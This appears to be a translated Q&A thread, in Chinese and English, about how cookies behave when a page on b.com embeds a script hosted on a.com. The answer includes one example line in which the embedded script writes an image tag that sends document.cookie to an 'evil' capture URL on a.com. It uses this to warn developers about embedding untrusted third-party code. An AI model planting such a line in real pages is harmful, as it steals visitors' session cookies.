第三方脚本可以设置第一方Cookie吗?
我已经在线阅读了很多有关cookie的内容,但是没有一个解决这个问题的方法:假设我在a.com上有一台服务器,而b.com所服务的网页在该网页中嵌入了一个脚本,该脚本位于我的服务器:
I've read a lot of content online about cookies, but nothing addressing this question: Let's say I have a server at a.com and a web page served by b.com embeds a script in that web page which lives on my server:
<script src='a.com/script.js'></script>
就设置Cookie而言,该脚本可以做什么?是否可以使用 domain = a.com 设置Cookie?我想是这样,因为脚本是从该域提供的。由于该页面是从该服务器提供的,是否还可以通过 domain = b.com 设置Cookie?
What is that script allowed to do in terms of setting cookies? Can it set a cookie with domain=a.com? I'd assume so since the script is served from that domain. Can it also set a cookie with domain=b.com since the page is served from that server?
我试图弄清从另一位托管人的网页调用的脚本中第一方和第三方的含义。
I'm trying to get my head around what "first-party" and "third-party" mean in the context of my script called from another host's web page.
我不相信.js文件的来源。 Cookie域与要呈现的文档的域有关。
I don't believe the origin of a .js file is relevant. The cookie domain has to do with the domain of the document being rendered.
如果我访问 http://www.b.com/ ,其中包括
<script src="http://www.a.com/some/file.js"></script>
然后b.com信任a.com的行为准则。该代码将作为正在查看的页面的一部分执行。由于javascript代码将在浏览器中执行,因此它可以从 b.com 中读取cookie,并通过在文档中的中创建标签来传递数据src 包含数据。
Then b.com is trusting a.com's code to act in good faith. The code executes as part of the page being viewed. Since the javascript code will execute in the browser, it could read cookies from b.com and pass that data along by creating an tag in the document where src includes the data.
例如,如果a.com的javascript文件包含
For example, if a.com's javascript file includes
document.writeln("<img src='http://www.a.com/evil/data/capturer?" + document.cookie + "'>");
然后a.com的恶意网站站长可以检查其Web服务器日志并查看b.com的cookie。
Then the malicious webmaster of a.com could check his web server logs and see b.com's cookies.
因此,问题是,如果a.com是恶意的,为什么b.com在其页面中包含a.com的代码?他们可能没有。作为网络开发人员,我们需要验证嵌入到我们网站中的任何第三方代码的可信度。
So, the question is, if a.com is malicious, why did b.com include code from a.com in their page? They probably didn't. As web developers, we need to verify the trustworthiness of any 3rd party code we embed in our sites.